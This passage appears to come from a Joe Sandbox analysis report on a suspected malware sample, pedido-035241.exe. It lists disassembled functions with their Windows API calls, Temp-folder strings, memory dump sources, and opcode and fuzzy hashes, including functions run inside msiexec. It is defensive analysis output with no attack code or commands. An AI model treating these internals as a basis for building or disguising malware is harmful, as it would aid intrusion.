                                                                                                                                                                            • Opcode Fuzzy Hash: cb7f8dab6708f5147347d1028f1fb4ade6693c058ac397d9bbab0fb1ec6fa22d
                                                                                                                                                                            • Instruction Fuzzy Hash: E911D8736041283BDB10666D9C45FAE3298DF81338F254237FA25F61D1D978D82182D8
                                                                                                                                                                            Function 00405DD6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004034E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405DDC
                                                                                                                                                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004034E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405DE6
                                                                                                                                                                            • lstrcatW.KERNEL32(?,0040A014), ref: 00405DF8
                                                                                                                                                                            Strings
                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DD6
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                            • API String ID: 2659869361-3081826266
                                                                                                                                                                            • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                                                                                                            • Instruction ID: 7ce36c7f15bc9200e130dd8400e4741a81934e97230acaa32a90c98a69430a15
                                                                                                                                                                            • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                                                                                                            • Instruction Fuzzy Hash: 09D0A7311019347AC1117B44AC04DDF67ACEE86304381403BF101B70A4CB7C5D518BFD
                                                                                                                                                                            Function 00403019 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • DestroyWindow.USER32(?,00000000,004031F7,00000001,?,?,?,?,?,00403847,?), ref: 0040302C
                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 0040304A
                                                                                                                                                                            • CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 00403067
                                                                                                                                                                            • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,00403847,?), ref: 00403075
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2102729457-0
                                                                                                                                                                            • Opcode ID: 9e4f0c6fd4882656516298184c032d47dc92d32e43a921afdb36728f0eb821a0
                                                                                                                                                                            • Instruction ID: a5ec5a94053ed6ec85071f05b03f47ec4a0cd54214f56ca0ac695578935c79f2
                                                                                                                                                                            • Opcode Fuzzy Hash: 9e4f0c6fd4882656516298184c032d47dc92d32e43a921afdb36728f0eb821a0
                                                                                                                                                                            • Instruction Fuzzy Hash: 44F05430603620EBC2316F10FD0898B7B69FB04B43B424C7AF041B11A9CB7609828B9C
                                                                                                                                                                            Function 00405EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00406507: lstrcpynW.KERNEL32(?,?,00000400,00403667,00429220,NSIS Error), ref: 00406514
                                                                                                                                                                              • Part of subcall function 00405E81: CharNextW.USER32(?,?,00425F10,?,00405EF5,00425F10,00425F10,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E8F
                                                                                                                                                                              • Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405E94
                                                                                                                                                                              • Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405EAC
                                                                                                                                                                            • lstrlenW.KERNEL32(00425F10,00000000,00425F10,00425F10,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F37
                                                                                                                                                                            • GetFileAttributesW.KERNEL32(00425F10,00425F10,00425F10,00425F10,00425F10,00425F10,00000000,00425F10,00425F10,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00405F47
                                                                                                                                                                            Strings
                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405EDE
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                            • API String ID: 3248276644-3081826266
                                                                                                                                                                            • Opcode ID: 35502845658bd9c497c4a55af97ec41c1cd1fbb9e0c21b6c2721f1846b66cb6f
                                                                                                                                                                            • Instruction ID: 801aa802fb238c59ad0d4c26bfab73d63669863fdcce98965586ad3d6a32a901
                                                                                                                                                                            • Opcode Fuzzy Hash: 35502845658bd9c497c4a55af97ec41c1cd1fbb9e0c21b6c2721f1846b66cb6f
                                                                                                                                                                            • Instruction Fuzzy Hash: CCF0D135105D6226D622333A9C09AAF1508CF82364B5A053FBCD1B22D1DF3C8A53DDBE
                                                                                                                                                                            Function 004054DD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • IsWindowVisible.USER32(?), ref: 0040550C
                                                                                                                                                                            • CallWindowProcW.USER32(?,?,?,?), ref: 0040555D
                                                                                                                                                                              • Part of subcall function 004044AF: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044C1
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3748168415-3916222277
                                                                                                                                                                            • Opcode ID: 97a082d88a1cb55e03e66ec7543f709465f1e5e5e36f808a355b04b1bc4c309f
                                                                                                                                                                            • Instruction ID: 896dd7550c11452a1c115f53988c63f353f89721b9370a05553ad38a214c3fb8
                                                                                                                                                                            • Opcode Fuzzy Hash: 97a082d88a1cb55e03e66ec7543f709465f1e5e5e36f808a355b04b1bc4c309f
                                                                                                                                                                            • Instruction Fuzzy Hash: 1601B171200609BFDF219F11DC81A6B3A27FB84354F100036FA01762D5C77A8E52DE5A
                                                                                                                                                                            Function 00403B21 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • FreeLibrary.KERNEL32(?,74DF3420,00000000,C:\Users\user\AppData\Local\Temp\,00403AF9,00403A28,?), ref: 00403B3B
                                                                                                                                                                            • GlobalFree.KERNEL32(?), ref: 00403B42
                                                                                                                                                                            Strings
                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B21
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Free$GlobalLibrary
                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                            • API String ID: 1100898210-3081826266
                                                                                                                                                                            • Opcode ID: 942278ec9c7e8339a206e332dc723704b636a129dd5b4a9861660f1353137a24
                                                                                                                                                                            • Instruction ID: 69a7d7bec05ee7f0f22c4a872385324a298b9ba4725761c8be5e054fe1390d88
                                                                                                                                                                            • Opcode Fuzzy Hash: 942278ec9c7e8339a206e332dc723704b636a129dd5b4a9861660f1353137a24
                                                                                                                                                                            • Instruction Fuzzy Hash: 25E0EC3750116097C6215F45EA08B5EBBB9AF54B26F09013AE9807B27187746C428B98
                                                                                                                                                                            Function 00405E22 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\pedido-035241.exe,C:\Users\user\Desktop\pedido-035241.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405E28
                                                                                                                                                                            • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\pedido-035241.exe,C:\Users\user\Desktop\pedido-035241.exe,80000000,00000003), ref: 00405E38
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CharPrevlstrlen
                                                                                                                                                                            • String ID: C:\Users\user\Desktop
                                                                                                                                                                            • API String ID: 2709904686-224404859
                                                                                                                                                                            • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                                                                                                                            • Instruction ID: b9880c769af8d41d832fb6ed8dc33ce50b4fd52cea508e3b62d11b70b6cf9f92
                                                                                                                                                                            • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                                                                                                                            • Instruction Fuzzy Hash: 98D0A7B3410D20AEC3126B04EC04D9F73ACFF5130078A4427F581A71A4D7785D818EEC
                                                                                                                                                                            Function 00405F5C Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F6C
                                                                                                                                                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405F84
                                                                                                                                                                            • CharNextA.USER32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F95
                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F9E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 190613189-0
                                                                                                                                                                            • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                                                                                                            • Instruction ID: 4f09c4eeff833ffafa08c7ff84761216a5ad6e9a06c03d1ebffd7ec4ed62f0c5
                                                                                                                                                                            • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                                                                                                            • Instruction Fuzzy Hash: 53F06231505818FFD7029FA5DD04D9EBBA8EF06254B2540AAE940F7250D678DE019BA9

                                                                                                                                                                            Executed Functions

                                                                                                                                                                            Function 02BEC146 Relevance: 6.5, Strings: 5, Instructions: 226COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2962879850.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_2be0000_msiexec.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                                                            • API String ID: 0-1487592376
                                                                                                                                                                            • Opcode ID: ef2be9f14bc497be85ee4970e9fdd183e8fabe5fc5fab8c8348b44915666d12b
                                                                                                                                                                            • Instruction ID: 3a62e47822e3809252033cde9e847d99102e7896f0e777568dcb19b60c974136
                                                                                                                                                                            • Opcode Fuzzy Hash: ef2be9f14bc497be85ee4970e9fdd183e8fabe5fc5fab8c8348b44915666d12b
                                                                                                                                                                            • Instruction Fuzzy Hash: 02A1D575E00218DFDB14DFA9D884A9DBBF2FF49310F1484AAE409AB365DB359881CF50
                                                                                                                                                                            Function 02BE5362 Relevance: 6.4, Strings: 5, Instructions: 192COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2962879850.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_2be0000_msiexec.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                                                            • API String ID: 0-1487592376
                                                                                                                                                                            • Opcode ID: 613aeaa6b9057e648c8d7ad9cf0991aa40f4411b1f5070ce23ba877406b4f3a5
                                                                                                                                                                            • Instruction ID: 981b6cf3c7292c996d367803e635f4de7d63bedb92202bcdc3c1c45c6f670526
                                                                                                                                                                            • Opcode Fuzzy Hash: 613aeaa6b9057e648c8d7ad9cf0991aa40f4411b1f5070ce23ba877406b4f3a5
                                                                                                                                                                            • Instruction Fuzzy Hash: 3D81B474E00218CFDB14DFA9D984A9DBBF2BF88304F54D0A9E809AB365DB349985CF10
                                                                                                                                                                            Function 02BED278 Relevance: 6.4, Strings: 5, Instructions: 186COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2962879850.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_2be0000_msiexec.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                                                            • API String ID: 0-1487592376
                                                                                                                                                                            • Opcode ID: 3e73b4ab8ced625089cf1af81f3bf7caaba19b6a0a5c7ff8792e8184b92c956a
                                                                                                                                                                            • Instruction ID: 0a8ba491b192a3298d63cbcadb2d32d95db54b8775d5a098373bb42efefdc6ef
                                                                                                                                                                            • Opcode Fuzzy Hash: 3e73b4ab8ced625089cf1af81f3bf7caaba19b6a0a5c7ff8792e8184b92c956a
                                                                                                                                                                            • Instruction Fuzzy Hash: DC81A474E00219CFDB14DFAAD984A9DBBF2BF88300F14D4A9E449AB365DB749985CF10
                                                                                                                                                                            Function 02BEC468 Relevance: 6.4, Strings: 5, Instructions: 186COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2962879850.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_2be0000_msiexec.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                                                            • API String ID: 0-1487592376
                                                                                                                                                                            • Opcode ID: 84adf21498753415596d384c4b9bd042bfb96ff94b1c81ca5a9d9e84f11b600a
                                                                                                                                                                            • Instruction ID: c1a65927a74fd01ccee783e0f50f76ad4c7353f34cbab76ae3c09bfc11f18acf
                                                                                                                                                                            • Opcode Fuzzy Hash: 84adf21498753415596d384c4b9bd042bfb96ff94b1c81ca5a9d9e84f11b600a
                                                                                                                                                                            • Instruction Fuzzy Hash: 06819674E00218DFDB14DFA9D984A9DBBF2BF88310F14D4AAE419AB365DB349981CF50
                                                                                                                                                                            Function 02BECCD8 Relevance: 6.4, Strings: 5, Instructions: 186COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2962879850.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_2be0000_msiexec.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                                                            • API String ID: 0-1487592376
                                                                                                                                                                            • Opcode ID: 0411324dd3ce7151076795e8f98474c90ed4da0b0e022ecc32ec30259bed2f29
                                                                                                                                                                            • Instruction ID: b32111bacb5de7130bce8c13d279ab5bec40bc4c1e57d8865a56b4293d5e8812
                                                                                                                                                                            • Opcode Fuzzy Hash: 0411324dd3ce7151076795e8f98474c90ed4da0b0e022ecc32ec30259bed2f29
                                                                                                                                                                            • Instruction Fuzzy Hash: 6C81A474E00218DFDB14DFA9D984A9DBBF2BF88300F14D4AAE419AB365DB349985CF50
                                                                                                                                                                            Function 02BECFAA Relevance: 6.4, Strings: 5, Instructions: 185COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2962879850.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_2be0000_msiexec.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                                                            • API String ID: 0-1487592376
                                                                                                                                                                            • Opcode ID: 3472bf2e5d2ac78c4344a037083715ee11da37043d616aa7668569026060db45
                                                                                                                                                                            • Instruction ID: c586b1951a8162ad388eaf324fe2f74024aad36621043c687160dfa3b2f09da9
                                                                                                                                                                            • Opcode Fuzzy Hash: 3472bf2e5d2ac78c4344a037083715ee11da37043d616aa7668569026060db45
                                                                                                                                                                            • Instruction Fuzzy Hash: 7381B074E00218CFDB14DFAAD984A9DBBF2BF88300F14D4A9E419AB365DB749985CF11
                                                                                                                                                                            Function 02BEC738 Relevance: 6.4, Strings: 5, Instructions: 184COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2962879850.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_2be0000_msiexec.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                                                            • API String ID: 0-1487592376
                                                                                                                                                                            • Opcode ID: 4abe1a596469017b024cd1c5a975a6f0d8238aba3a27f979f27d594fdb4014b1
                                                                                                                                                                            • Instruction ID: cede41a2cd34e5cf94219cc72385eb9bced9323524272d0089897b41ffaaea5e
                                                                                                                                                                            • Opcode Fuzzy Hash: 4abe1a596469017b024cd1c5a975a6f0d8238aba3a27f979f27d594fdb4014b1
                                                                                                                                                                            • Instruction Fuzzy Hash: 75819574E00218DFDB14DFA9D984A9DBBF2BF88300F14D0AAE459AB365DB349985CF50
